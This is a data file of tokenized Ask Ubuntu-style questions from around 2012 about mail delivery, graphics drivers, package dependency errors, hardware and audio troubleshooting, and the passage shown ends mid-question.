218343	what should be the path for storing maildir e-mails ?	am i storing e-mails to the correct path ? working from the dovecot-postfix package i 'm able to deliver e-mails to myself as so : thufir @ dur : ~ $ thufir @ dur : ~ $ telnet localhost 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 dur.bounceme.net esmtp postfix ( ubuntu ) helo me 250 dur.bounceme.net mail from : < thufir @ example.net > 250 2.1.0 ok rcpt to : < thufir @ localhost > 250 2.1.5 ok data 354 end data with < cr > < lf > . < cr > < lf > subject : to evolution mail we 'll see if this goes through . . 250 2.0.0 ok : queued as 43d6f2a07c1 quit 221 2.0.0 bye connection closed by foreign host . thufir @ dur : ~ $ and then here 's the message : thufir @ dur : ~ $ ll maildir/new/ total 20 drwx -- -- -- 2 thufir thufir 4096 nov 16 18:56 ./ drwx -- -- -- 5 thufir thufir 4096 nov 16 18:56 ../ -rw -- -- -- - 1 thufir thufir 410 nov 16 11:57 1353095866.m305477p3932.dur , s=410 , w=422 -rw -- -- -- - 1 thufir thufir 424 nov 16 17:20 1353115248.m841336p2990.dur , s=424 , w=436 -rw -- -- -- - 1 thufir thufir 445 nov 16 18:56 1353121003.m187706p3838.dur , s=445 , w=457 thufir @ dur : ~ $ thufir @ dur : ~ $ nl maildir/new/1353121003.m187706p3838.dur\ , s\=445\ , w\=457 1 return-path : < thufir @ example.net > 2 x-original-to : thufir @ localhost 3 delivered-to : thufir @ localhost 4 received : from me ( localhost [ 127.0.0.1 ] ) 5 by dur.bounceme.net ( postfix ) with smtp id 43d6f2a07c1 6 for < thufir @ localhost > ; fri , 16 nov 2012 18:55:55 -0800 ( pst ) 7 subject : to evolution mail 8 message-id : < 20121117025613.43d6f2a07c1 @ dur.bounceme.net > 9 date : fri , 16 nov 2012 18:55:55 -0800 ( pst ) 10 from : thufir @ example.net 11 we 'll see if this goes through . thufir @ dur : ~ $ do i perhaps have postfix misconfigured ? i ask because evolution seems to use a different path for mail .
218344	why am i getting a `` port 22 : connection refused '' error ?	i am getting a port 22 : connection refused error while connecting to a server . i have both the openssh client and server installed , and they are running . but still there is an error . please help .
218349	unity not loading after installing nvidia proprietary drivers	i just got a new nvidia gtx 650 . the huge downside at this point is that whenever i use the open source driver , the computer is ridiculously slow . whenever i use the proprietary drivers and restart , the desktop wallpaper will load and nothing more . i 've tried restarting unity only to get a continuous rolling error . with the ccsm options , unity is enabled , yet nothing appears . whenever i 'm using proprietary drivers i get a microcode error which happens so quickly that i ca n't record the number .
218358	how do i install sublime text 2 full version ?	i have followed the steps given in various blogs to install sublime text 2 , but after installing when i use it i get the message as unregistered at the top . how can i get a full version of sublime text 2
218360	category list for the unity launcher	i 've looked the official docs unitylaunchersanddesktopfiles and i ca n't seem to find a list of categories that the launcher supports anywhere . is there such a compiled list somewhere so i can quickly review what are my options ?
218364	correct configuration of graphics card nvidia geforce gt 520mx optimus on 12.10 x64 ( asus k53s laptop )	recently i installed the latest version of ubuntu in my laptop . i made the installation with the following guide . the graphic card works and the window displays optirun glxspheres in operation and list the nvidia module . when i try to run blender and render an animation with cycles , it processes some frames and the program closes blender . it 's strange because in the version of ubuntu 11.04 this did not happen , it worked normal . i am concerned that is damaged video card . this is the debug file .
218370	how to make logitech anywhere mx work in ubuntu 12.x ?	i have a logitech anywhere mx mouse ( wireless ) , when i connect it to the computer it does n't work . the mouse works in other computers with windows and with fedora 17 and fedora 19 , but it does n't work in two different computers with ubuntu 12.04 and 12.10 . moreover these same computers work with another microsoft wireless mouse . so i think the combination of logitech mx and ubuntu does n't play well . the dmesg log entry looks like this : [ 578.845838 ] usb 3-2 : product : usb receiver [ 578.845841 ] usb 3-2 : manufacturer : logitech [ 578.851625 ] logitech-djreceiver 0003:046d : c52b.0009 : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:14.0-2/input2 [ 578.851899 ] logitech-djreceiver 0003:046d : c52b.0009 : logi_dj_probe : logi_dj_recv_query_paired_devices error : -32 [ 578.854518 ] logitech-djreceiver : probe of 0003:046d : c52b.0009 failed with error -32 instead of the expected ( taken from fedora ) : [ 154344.634520 ] usb 2-1.2 : manufacturer : logitech [ 154344.647935 ] logitech-djreceiver 0003:046d : c52b.000d : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1d.0-1.2/input2 [ 154344.653788 ] input : logitech unifying device . wireless pid:1017 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.2/0003:046d : c52b.000d/input/input21 [ 154344.654192 ] logitech-djdevice 0003:046d : c52b.000e : input , hidraw1 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:1017 ] on usb-0000:00:1d.0-1.2:1 update : i would say that at this point , solaar is the way to go . so i accepted a previous answer suggesting this .
218371	does ubuntu 12.10 64 bit support the amd radeon hd 6790 video card ?	quick question : does ubuntu 12.10 or 12.04.1 64 bit support the amd radeon hd 6790 video card ? i tried checking ubuntu 's hardware support wiki information but it has n't been updated since july 2011 - what a shame . any help is appreciated .
218375	need to send a simple .txt file to a couple email addresses	ive been trying to get this to work all night . mutt doesnt seem to work and i cant install mail or mailx packages because apt-get gives me errors about them not having installation candidate . what i want to do is email a textfile.txt to a few gmail accounts ... preferably i would like to have a command in a bash script doing this , then i can set the script on a cron job to do it daily . also preferably it will require minimal configuration ... i dont need to worry about receiving emails , i just need to send out . whats the best way to do this ?
218377	install/remove language show only english , no other choice	first of all sorry for my poor english . so my question is , when i want to choose other language to install , it show only english installed [ checked ] , but what i can see in the other post , there have list of languages that allow user to choose . see this print screen i am a totally new in linux , what should i do to get the list of languages appear ? and why is this happen ? is that because i skipped the language packs during installation ? sorry if this question exist before , i cant find it . thanks
218381	hide an account from the login screen	i am using ubuntu 12.10 , can someone give-me instructions on how to make an account invisible from the login screen without deleting it ?
218382	installing the liquorix kernel on ubuntu 12.04 x64bit	has anyone had any luck installing the liquorix kernel for 3.6.6 or any of the newer ones ? ? i want to install it on ubuntu 12.04x64 . thank you .
218383	reducing a scanned pdf file size	i need to compress a scanned pdf file from 1.5 mb to under 600 kb . i 've tried a number of ghostscript solutions given on other threads but they seem to compress it all the way down to just 2.2 kb and all the content is lost . can someone provide a solution ?
218384	modem does n't connect to internet ( h9601 prolink )	i 'm using ubuntu 9.04 and i have a conextant h9601 prolink modem.. i installed it using eciadsl and i made a synch.bin using xp too but when i give the command eciadsl-start this is what happens . [ eciadsl 1/5 ] setting up usb support ... preliminary usb device filesystem is ok loading uhci support ... warning : uhci-hcd module does n't exist [ eciadsl 2/5 ] uploading firmware ... firmware loaded successfully [ eciadsl 3/5 ] synchronization ... please wait.. synchronisation in progress [ - ] please wait.. synchronisation in progress [ \ ] please wait.. synchronisation in progress [ | ] please wait.. synchronisation in progress [ / ] please wait.. synchronisation i ok eciadsl-synch : success synchronization successful [ eciadsl 4/5 ] connecting to provider ... connection successful [ eciadsl 5/5 ] setting up route table ... waiting for tap0 ... error : could n't set your static ip or your external gateway if you do n't use pppoe , please check your configuration . eventhough it says the connection is successful . i ca n't connect to internet pls help ... i 'm new to ubuntu.. after madukas suggestion and i tried it and typed eciadsl-start after rebooting . the same thing came up then i tried for another 2 or 3 times then it said . error : eciadsl-pppoeci is already running ! you should kill all instances of eciadsl-pppoeci and restart this script . then i typed ifconfig then , eth0 link encap : ethernet hwaddr 00:22:68:7b : e1:89 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:252 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:240 ( 240.0 b ) tx bytes:240 ( 240.0 b ) tap0 link encap : ethernet hwaddr 12:2d:83:26:55 : b1 inet6 addr : fe80 : :102d:83ff : fe26:55b1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:0 ( 0.0 b ) tx bytes:468 ( 468.0 b ) i tried to use firefox but nothing came up .
218389	how to set up internet wire connection on ubuntu 12.04 ?	i install ubuntu 12.04 on vmware on d drive of window 7 . now , window 7 have internet connection but ubuntu have no internet connection . in window 7 , i use automatically detect proxy with wired connection . it 's ok on window7 . why it does n't on ubuntu . please let me know .
218390	adding a wine ( .exe ) file to open/play files in thunar 's 'custom actions '	what is the line parameter in thunar 's `` custom actions '' that would play a music directory in a wine ( .exe ) program ? i want to put foobar2000 ( and possibly other such applications ) in thunar 's custom actions ( actions that can be added/edited to be used in the context menu to play music folder 's content ) . if i put no command parameter at the end of path , the player opens but there is no play and no files in the play list . if i add any of the listed parameters i get the error unknown commandline parameter : /path.to.file ( giving an answer to this question depends on knowing the cli command that would have to be added into thunar - so please look at this question too )
218393	ubuntu installed on the wrong partition	i accidentally installed ubuntu on the windows backup partition of my computer . how can i uninstall it with out messing up the windows backup ?
218395	wipe empty space with cat	i use cat /dev/zero to write on free space on each drive one by one but my question should i use ; cat /dev/zero > wipe_space or cat /dev/urandom > wipe_space 2.i know that first write zero and the second write random data , but zeros is much faster , so whats the difference ? 3.and is there any difference between cat , dd command ? 4.last question is this way secure just dont want the one who will get my pc restore any thing with recovery tools . note : i 'll not erase every thing , 'll delete personal stuff and wipe free space !
218397	problem in my terminal related clamav	recently i decided to use avast antivirus . i uninstalled clamav and installed avast . now whenever i use my terminal i get the following errors . : 5 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/1,250 kb of archives . after this operation , 5,120 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... dpkg : warning : files list file for package `clamav-daemon ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `python-pyclamav ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `clamav-base ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `clamav-freshclam ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libclamav6 ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `python-clamav ' missing , assuming package has no files currently installed . ( reading database ... 554940 files and directories currently installed . ) please help . thank you
218399	uds , user involvement	what does one do at ubuntu developer summit , if they are only a standard user ? do they get a chance to be involved in the discussions ? i am looking at attending a uds but i wanted to know if users are involved in the making of the next ubuntu or are just allowed to watch .
218400	trying to install atheros ar8161 ethernet driver without internet connection	i have downloaded appropriate build-essential and linux headers files ( and all dependencies ... .i think ) from the internet and placed them on my desktop . i am now trying to install the atheros ar8161 driver from this package : compat-wireless-2012-11-13-pc here is the output : http : //paste.ubuntu.com/1364448/ you can see from the code ... or it appears to me ... that build-essential and linux-headers have been installed properly . but i am still getting these error messages . why ?
218406	infrared remote control stopped working	i recently installed ubuntu 12.04 and my compro k100 worked fine in the beginning . but somewhere along the way it has stopped working . who can help me diagnose the problem ? to start off here is some info . lsusb : bus 002 device 018 : id 185b:3082 compro k100 infrared receiver v2 dmesg | grep compro : [ 12.992886 ] mceusb 2-1.4:1.0 : registered compro videomate ir with mce emulator interface version 1 [ 2468.755328 ] mceusb 2-1.2:1.0 : registered compro videomate ir with mce emulator interface version 1 dmesg | grep usb : [ 1.641739 ] usbcore : registered new interface driver usbfs [ 1.641748 ] usbcore : registered new interface driver hub [ 1.641768 ] usbcore : registered new device driver usb [ 2.352920 ] usbcore : registered new interface driver libusual [ 2.644360 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 2.887996 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 3.091819 ] usb 1-1.5 : new high-speed usb device number 3 using ehci_hcd [ 3.639003 ] usb 2-1.1 : new high-speed usb device number 3 using ehci_hcd [ 3.802762 ] usb 2-1.2 : new high-speed usb device number 4 using ehci_hcd [ 3.898544 ] scsi6 : usb-storage 2-1.2:1.0 [ 3.898595 ] usbcore : registered new interface driver usb-storage [ 3.966517 ] usb 2-1.3 : new high-speed usb device number 5 using ehci_hcd [ 4.059965 ] scsi7 : usb-storage 2-1.3:1.0 [ 4.130275 ] usb 2-1.4 : new high-speed usb device number 6 using ehci_hcd [ 4.293976 ] usb 2-1.8 : new full-speed usb device number 7 using ehci_hcd [ 4.412784 ] usb 2-1.8 : config 0 descriptor ? ? [ 4.509855 ] usb 2-1.1.1 : new low-speed usb device number 8 using ehci_hcd [ 4.627949 ] input : logitech usb-ps/2 optical mouse as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1.1/2-1.1.1:1.0/input/input5 [ 4.628042 ] generic-usb 0003:046d : c01b.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb-ps/2 optical mouse ] on usb-0000:00:1d.0-1.1.1/input0 [ 4.628057 ] usbcore : registered new interface driver usbhid [ 4.628059 ] usbhid : usb hid core driver [ 4.709412 ] usb 2-1.1.2 : new low-speed usb device number 9 using ehci_hcd [ 4.828284 ] input : logitech logitech usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1.2/2-1.1.2:1.0/input/input6 [ 4.828426 ] generic-usb 0003:046d : c316.0002 : input , hidraw1 : usb hid v1.10 keyboard [ logitech logitech usb keyboard ] on usb-0000:00:1d.0-1.1.2/input0 [ 4.835006 ] input : logitech logitech usb keyboard as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1.2/2-1.1.2:1.1/input/input7 [ 4.835236 ] generic-usb 0003:046d : c316.0003 : input , hidraw2 : usb hid v1.10 device [ logitech logitech usb keyboard ] on usb-0000:00:1d.0-1.1.2/input1 [ 12.801271 ] input : media center ed . ehome infrared remote transceiver ( 185b:3082 ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/rc/rc0/input9 [ 12.801320 ] rc0 : media center ed . ehome infrared remote transceiver ( 185b:3082 ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/rc/rc0 [ 12.921244 ] input : laptop_integrated_webcam_fhd as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5:1.0/input/input10 [ 12.921369 ] usbcore : registered new interface driver uvcvideo [ 12.992886 ] mceusb 2-1.4:1.0 : registered compro videomate ir with mce emulator interface version 1 [ 12.992896 ] mceusb 2-1.4:1.0 : 2 tx ports ( 0x0 cabled ) and 2 rx sensors ( 0x0 active ) [ 12.992931 ] usbcore : registered new interface driver mceusb [ 13.584509 ] input : mce ir keyboard/mouse ( mceusb ) as /devices/virtual/input/input11 [ 13.605165 ] rc rc0 : lirc_dev : driver ir-lirc-codec ( mceusb ) registered at minor = 0 [ 1881.898680 ] usb 2-1.4 : usb disconnect , device number 6 [ 1898.456785 ] usb 2-1.4 : new high-speed usb device number 10 using ehci_hcd [ 1898.560247 ] scsi8 : usb-storage 2-1.4:1.1 [ 1961.140680 ] usb 2-1.4 : usb disconnect , device number 10 [ 1961.850500 ] usb 2-1.4 : new high-speed usb device number 13 using ehci_hcd [ 1961.952297 ] scsi9 : usb-storage 2-1.4:1.1 [ 1962.674182 ] usb 2-1.4 : usb disconnect , device number 13 [ 1962.872947 ] usb 2-1.4 : new high-speed usb device number 14 using ehci_hcd [ 1962.977036 ] scsi10 : usb-storage 2-1.4:1.1 [ 1963.185342 ] usb 2-1.4 : usb disconnect , device number 14 [ 1963.895426 ] usb 2-1.4 : new high-speed usb device number 17 using ehci_hcd [ 1963.998828 ] scsi11 : usb-storage 2-1.4:1.1 [ 2459.249660 ] usb 2-1.2 : usb disconnect , device number 4 [ 2468.228341 ] usb 2-1.2 : new high-speed usb device number 18 using ehci_hcd [ 2468.562431 ] input : media center ed . ehome infrared remote transceiver ( 185b:3082 ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/rc/rc1/input22 [ 2468.562588 ] rc1 : media center ed . ehome infrared remote transceiver ( 185b:3082 ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/rc/rc1 [ 2468.562850 ] input : mce ir keyboard/mouse ( mceusb ) as /devices/virtual/input/input23 [ 2468.564473 ] rc rc1 : lirc_dev : driver ir-lirc-codec ( mceusb ) registered at minor = 0 [ 2468.755328 ] mceusb 2-1.2:1.0 : registered compro videomate ir with mce emulator interface version 1 [ 2468.755339 ] mceusb 2-1.2:1.0 : 2 tx ports ( 0x0 cabled ) and 2 rx sensors ( 0x0 active ) lsmod | grep usb : mceusb 18143 0 rc_core 26412 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , mceusb usbhid 47199 0 hid 99592 1 usbhid usb_storage 49198 2 what else can i run to get insight as to why this device stopped working ?
218407	python desktopcouch only works with root account	i 'm trying to use this simple example in python : > > > from desktopcouch.records.server import couchdatabase > > > from desktopcouch.records.record import record > > > db = couchdatabase ( 'testing ' , create=true ) > > > but only works in root account , with a regular user : > > > from desktopcouch.records.server import couchdatabase > > > from desktopcouch.records.record import record > > > db = couchdatabase ( 'testing ' , create=true ) traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 101 , in __init__ oauth_tokens=oauth_tokens , ctx=ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 75 , in __init__ oauth_tokens=oauth_tokens , ctx=ctx , views_factory=views_factory ) file `` /usr/lib/pymodules/python2.7/desktopcouch/records/database.py '' , line 123 , in __init__ self._reconnect ( ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/server.py '' , line 81 , in _reconnect port = find_port ( ctx=self.ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/platform/__init__.py '' , line 48 , in find_port return platform_find_port ( pid , ctx ) file `` /usr/lib/pymodules/python2.7/desktopcouch/application/platform/linux/__init__.py '' , line 100 , in platform_find_port proxy = bus.get_object ( 'org.desktopcouch.couchdb ' , '/ ' ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken
218410	texlive and kile	i recently had upgraded my machine from a 12.04 installation to a 12.10 version . i use latex for my publication work and therefore i use texlive and kile , both of which are on the ubuntu package list . on my upgrade to the latest version of ubuntu , the texlive files have mixed up the configurations and therefore the distribution is not able to find the relevant fonts i have used in my earlier documents . in this context , i downloaded the iso file for texlive from the texlive website first . i then completely removed the texlive package from my system and the directories storing the texlive configurations . finally , i mounted the iso file and installed texlive on my system . i set the paths according to the recommendations of the installer and therefore the files are now compiling through the use of the command prompt . however , i prefer kile as an ide for latex . whenever , i try to install kile it also asks to download the tex-common , texlive-* packages and their corresponding dependencies . i therefore downloaded the kile package to a local directory by using apt-get download kile and then attempted to install kile by using sudo dpkg -- force-all -i kile* after this point , the synaptic manager tells me that the kile package is broken and it should be repaired by installing the relevant dependencies . the software manager also shows its window . how do i stop this from happening , or is there another better ide for kile ? do have to really go through the painful way of compiling kile from source ?
218413	apt-get error , can not install many packages ?	how do i fix this ? it shows an error , and i do n't know how to fix it . i want to install crossover . reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : crossover : i386 : depends : libc6 : i386 ( > = 2.3 ) but it is not installed depends : libice6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libsm6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libx11-6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libxext6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libfreetype6 : i386 but it is not installed depends : libz1 : i386 depends : perl5-base : i386 depends : perl-modules : i386 but it is not installable depends : python : i386 ( > = 2.4 ) but it is not installed depends : python-gtk2 : i386 but it is not installed depends : python-glade2 : i386 but it is not installed depends : desktop-file-utils : i386 but it is not installed depends : libasound2 : i386 but it is not installed depends : libgl1 : i386 depends : libxrandr2 : i386 but it is not installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies edit i have another recent error . you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : crossover : i386 : depends : libc6 : i386 ( > = 2.3 ) but it is not installed depends : libice6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libsm6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libx11-6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libxext6 : i386 but it is not installed or xlibs : i386 but it is not installable depends : libfreetype6 : i386 but it is not installed depends : libz1 : i386 depends : perl5-base : i386 depends : perl-modules : i386 but it is not installable depends : python : i386 ( > = 2.4 ) but it is not installed depends : python-gtk2 : i386 but it is not installed depends : python-glade2 : i386 but it is not installed depends : desktop-file-utils : i386 but it is not installed depends : libasound2 : i386 but it is not installed depends : libgl1 : i386 depends : libxrandr2 : i386 but it is not installed e : unmet dependencies . try using -f. running apt-get -f install gives me the same error every time .
218414	ubuntu 12.04 and/or 12.10 can boot from software raid5 ?	i read from a very nice post ( http : //forevergeeks.com/setup-ubuntu-server-with-raid-5/ ) that ubuntu can not boot from a raid 5 partition . since the post is quite old i wonder if this is still true or now i can create only raid5 without need to have a boot partition of raid1 .
218418	dependency problem with mysql-server-core-5.5	when i start the ubuntu software centre , it says i can not do anything until the package catalog is repaired . however , repairing fails . i ran sudo apt-get -f install and found the problem to be : mysql-server-5.5 depends on mysql-server-core-5.5 ( = 5.5.24-0ubuntu0.12.04.1 ) ; however : version of mysql-server-core-5.5 on system is 5.5.28-0ubuntu0.12.04.2 . so , the question is , how do i install that version and resolve the dependency problem ?
218419	how do i enable silent updates for my system ?	how can i tell ubuntu 12.10 to perform auto updates silently without any questions and messages ? in gui tool there is an option to do this if security updates are available . but i want all updates to be installed this way . i think it can be done using apt-get with cron . but is it the best way ?
218421	how can i get back my desktop ? the left and top panels	i installed the ubuntu 12.10 and the driver for ati radeon hd 4330 ( amd catalystâ˘ 12.6 proprietary linux x86 display driver ) and the latest updates . after the restart now i can see only the desktop background and nothing more . no left or top panels . the resolution changed to 1024x768 and the graphic changed to : vesa : m92 . what happened ? is there something wrong with the driver ? how can i solve this ? i 'm a beginner , please answer according to this . thank you !
218427	how to read ansi encoded .srt files in the right way ?	is there anyway of any media player that i can view arabic ansi encoded .srt files in the right way without converting them to utf-8 encoding ? i tried vlc , gnome mplayer and the default movie player but all of them are viewing the subtitles as question marks or rectangles .
218429	i ca n't start mysql in ubuntu 11.04	i downloaded following files of oracle.com : mysql-server-5.5.28-1.linux2.6.i386.rpm < br/ > mysql-client-5.5.28-1.linux2.6.i386.rpm < br/ > mysql-shared-5.5.28-1.linux2.6.i386.rpm < br/ > then with `` alien -i '' command installing rpm packages and when starting mysql get following error : starting mysql < br/ > ... . * the server quit without updating pid file ( /var/lib/mysql/omid-desktop.pid ) . error log : 121117 13:21:30 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 121117 13:21:30 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : table 'mysql.plugin ' does n't exist 121117 13:21:30 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 121117 13:21:30 innodb : the innodb memory heap is disabled 121117 13:21:30 innodb : mutexes and rw_locks use innodb 's own implementation 121117 13:21:30 innodb : compressed tables use zlib 1.2.3 121117 13:21:30 innodb : using linux native aio 121117 13:21:30 innodb : initializing buffer pool , size = 128.0m 121117 13:21:30 innodb : completed initialization of buffer pool 121117 13:21:30 innodb : highest supported file format is barracuda . 121117 13:21:30 innodb : waiting for the background threads to start 121117 13:21:31 innodb : 1.1.8 started ; log sequence number 1595675 121117 13:21:31 [ note ] recovering after a crash using mysql-bin 121117 13:21:31 [ note ] starting crash recovery ... 121117 13:21:31 [ note ] crash recovery finished . 121117 13:21:31 [ note ] server hostname ( bind-address ) : '0.0.0.0 ' ; port : 3306 121117 13:21:31 [ note ] - '0.0.0.0 ' resolves to '0.0.0.0 ' ; 121117 13:21:31 [ note ] server socket created on ip : '0.0.0.0 ' . 121117 13:21:31 [ error ] fatal error : ca n't open and lock privilege tables : table 'mysql.host ' does n't exist 121117 13:21:31 mysqld_safe mysqld from pid file /var/lib/mysql/omid-desktop.pid ended 121117 13:25:38 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 121117 13:25:38 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : table 'mysql.plugin ' does n't exist 121117 13:25:38 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 121117 13:25:38 innodb : the innodb memory heap is disabled 121117 13:25:38 innodb : mutexes and rw_locks use innodb 's own implementation 121117 13:25:38 innodb : compressed tables use zlib 1.2.3 121117 13:25:38 innodb : using linux native aio 121117 13:25:38 innodb : initializing buffer pool , size = 128.0m 121117 13:25:38 innodb : completed initialization of buffer pool 121117 13:25:38 innodb : highest supported file format is barracuda . 121117 13:25:38 innodb : waiting for the background threads to start 121117 13:25:39 innodb : 1.1.8 started ; log sequence number 1595675 /usr/sbin/mysqld : too many arguments ( first extra is 'start ' ) . use -- verbose -- help to get a list of available options 121117 13:25:39 [ error ] aborting 121117 13:25:39 innodb : starting shutdown ... 121117 13:25:40 innodb : shutdown completed ; log sequence number 1595675 121117 13:25:40 [ note ] /usr/sbin/mysqld : shutdown complete
218430	ca n't install teamviewer on ubuntu 12.04	i have a dell inspiron 6400 laptop . i was a windows user but i want to start using ubuntu from now on . everything goes well except installation of the teamviewer . i have downloaded the file from the official website . there , it says that just double click on the *.deb file and it will install it automatically . well , it gives an error : failed to remove essential system package , you requested to remove a package which is an essential part of your system . then i tried the second way of installation , which is on the terminal . i types as suggested : sudo dpkg -i teamviewer_linux.deb . it started installing but later on failed . here is the copy of the screen . preparing to replace teamviewer7 : i386 7.0.9377 ( using teamviewer_linux.deb ) ... unpacking replacement teamviewer7 : i386 ... dpkg : dependency problems prevent configuration of teamviewer7 : i386 : teamviewer7 : i386 depends on bash ( > = 3.0 ) . teamviewer7 : i386 depends on libc6 ( > = 2.7 ) . teamviewer7 : i386 depends on libasound2 . teamviewer7 : i386 depends on zlib1g . teamviewer7 : i386 depends on libxext6 . dpkg : error processing teamviewer7 : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : teamviewer7 : i386 i have already checked these dependent files in synaptic and they are all installed . what am i doing wrong ?
218432	how extract strings from a .ui file ( glade ) with gettext ?	i 'm trying to extract the strings from this file : http : //bazaar.launchpad.net/~gufw-developers/gui-ufw/gufw-13.04/view/head : /data/ui/add.ui which is the command for it ? this not works : user @ desktop : ~/desktop $ xgettext -k_ -kn_ -o messages.pot *.ui xgettext : warning : file `add.ui ' extension `ui ' is unknown ; will try c add.ui:192 : warning : unterminated character constant add.ui:483 : warning : unterminated character constant add.ui:750 : warning : unterminated character constant user @ desktop : ~/desktop $ thanks in advance ! : )
218435	where is my mounted iso if not in `/media` nor in `~/.gvfs/` ?	i have mounted an iso with furius iso mount tool . now : i can not see it in /media or in ~/.gvfs/ ( as suggested here - please do not mark as clone before i get a solution here : because the other question received that very specific and definitive answer that is not good for me and would not get new answers , which i am asking here for )
218441	creating new unity launcher fails	i 've generated a .desktop file , a shortcut to a directory . after clicking works fine , so the syntax should be correct . # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=link icon [ pl_pl ] =gnome-panel-launcher name [ pl_pl ] =projekty url=/home/user/my/projects name=projekty icon=gnome-panel-launcher but when i drag it to the unity launcher ( says `` drop here to add a launcher '' ) nothing happens after dropping . what do i miss ?
218442	hdmi audio works only with aplay -d alsa test wavs ; open source radeon drivers ; kernel 3.5 vgaswitcheroo	i 've trolled the internets to make hdmi work on my system ubuntu 12.04. software center kernel 3.5 uname : linux ubuntu 3.5.0-18-generic # 29~precise1-ubuntu smp ... x86_64 x86_64 x86_64 gnu/linux open source radeon drivers vgaswitcheroo ( hybrid intel/radeon gpu ) : i boot with intel , not radeon , running . ( and recall that with kernel 3.5 , vgaswitcheroo now gives info on a third item , `` dis-audio '' ; it indicates pwr on my system ) /etc/rc.local : chown user : user /sys/kernel/debug/ # change `` username '' with your user name echo off > /sys/kernel/debug/vgaswitcheroo/switch grub indeed now has `` radeon.audio=1 '' for testing audio , i did : aplay -l which gave me the card and device , which made me try aplay -d plughw:1,3 /usr/share/sounds/alsa/front_center.wav and lo ! i get crystal clear sound on my hdtv.if i play an mp3 file as the argument to that command , i get noise as , i guess , aplay interprets the mp3 code as a wav . if i play a .wav that is not in the /usr/share/sounds/alsa/ directory , i get nothing . internet flash video in browser plays no sound over hdmi . both system sounds control and pavucontrol have hdmi cedar selected . alas , i can not get sound for any gui test ( left , right ) . why would only aplay , and only when directed with -d plughw , yield sound over hdmi ? i 've also tried only using one sound program at a time , if it was a limitation of alsa , so i tried aplay with web browser and even the 